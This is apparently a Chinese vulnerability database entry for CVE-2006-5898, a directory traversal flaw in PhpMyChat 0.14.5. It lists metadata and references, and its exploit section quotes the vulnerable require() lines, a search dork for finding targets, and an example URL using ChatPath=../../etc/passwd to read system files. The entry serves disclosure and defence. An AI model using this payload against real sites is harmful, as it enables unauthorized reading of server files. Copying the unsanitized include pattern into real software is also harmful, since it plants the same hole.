PhpMyChat localization/languages.lib.php3 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192884 漏洞类型 路径遍历
发布时间 2006-11-15 更新时间 2006-11-15
CVE编号 CVE-2006-5898 CNNVD-ID CNNVD-200611-234
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/87371
https://cxsecurity.com/issue/WLB-2006110055
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-234
|漏洞详情
PhpMyChat中的localization/languages.lib.php3中存在目录遍历漏洞,远程攻击者可以通过ChatPath参数(该参数中包含..)读取任意文件。
|漏洞EXP
************************************************************************
*******
# Title  :  PhpMyChat  <= 0.14.5 Source Code Disclosure Vulnerability

# Author :   ajann

# Dork :   phpMyChat 0.14.5 , phpMyChat

# Vuln;

************************************************************************
*******
[File]
localization/languages.lib.php3
[/File]

[Code,1]
languages.lib.php3 Error:

..
....
require("./${ChatPath}config/config.lib.php3");
require("./${ChatPath}lib/database/".C_DB_TYPE.".lib.php3");
require("./${ChatPath}lib/clean.lib.php3");
....
..

Key [:] ChatPath=[file]

Example:

http://target.com/path/localization/languages.lib.php3?ChatPath=../../et
c/passwd

# ajann,Turkey
# ...
# Im not Hacker!
|受影响的产品
phpHeaven phpMyChat 0.14.5
|参考资料

来源:BUGTRAQ
名称:20061108PhpMyChat<=0.14.5SourceCodeDisclosureVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/450923/100/0/threaded
来源:XF
名称:phpmychat-languages-source-disclosure(30121)
链接:http://xforce.iss.net/xforce/xfdb/30121
来源:SREASON
名称:1852
链接:http://securityreason.com/securityalert/1852